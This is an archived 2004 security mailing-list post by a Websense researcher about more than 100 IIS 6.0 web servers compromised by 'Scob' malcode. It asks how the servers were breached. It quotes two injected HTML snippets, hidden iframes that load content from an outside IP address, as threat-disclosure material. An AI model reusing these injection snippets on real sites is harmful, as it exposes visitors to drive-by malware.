The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Scob variant using IIS 6.0 or just upgrades ?


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Wed, 7 Jul 2004 11:21:12 -0700
From: "Hubbard, Dan" <[email protected]>
To: [email protected], [email protected]
Subject: Scob variant using IIS 6.0 or just upgrades ?

Our mining processes have uncovered more than 100 additional sites that
are appear to have been breached and used as part of the "Scob" malcode.
Unlike the other sites discovered these sites are NOT running IIS 5.0
and appear as though they are not using the IIS "footer" vulnerability.
There are two variants of jscript that appear to be using IE Iframe
vulnerabilities that they appear to be exploiting on the client side,
however we cannot tell how the servers have been compromised. This maybe
echo'd information, however I have not seen any IIS 6.0 information
posted anywhere.=20

Current theory is that these machines were compromised as IIS 5.0 and
then upgraded but not cleaned.

* all pages are infected with malcode on sites
* 96 out of 100 of the site are running HTTPS also.
* all sites are running IIS 6.0 not 5.0=20

These are two variants of the HTML. Both appear at the bottom of the
HTML:

Variant 1
--------------

<script language=3D"JavaScript"><!--
</script><iframe src=3D\"http://217.107.218.147/dot.php\" height=3D\"1\"
width=3D\"1\" scrolling=3D\"no\"
frameborder=3D\"no\"/>");sc088("trk716","4");}}// --></script>


Variant 2
--------------

<iframe width=3D0 height=3D0 =
src=3D"http://217.107.218.147/fed.html"></iframe>

**Does anyone else have information as to what the URL's outlined above
contained and/or any information about compromised IIS 6.0 machines ?**

**Perhaps these machines have simply been upgraded and the malcode was
not "cleaned" off them ? **



_______________________________
Dan Hubbard
Security & Technology Research
Websense, Inc.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру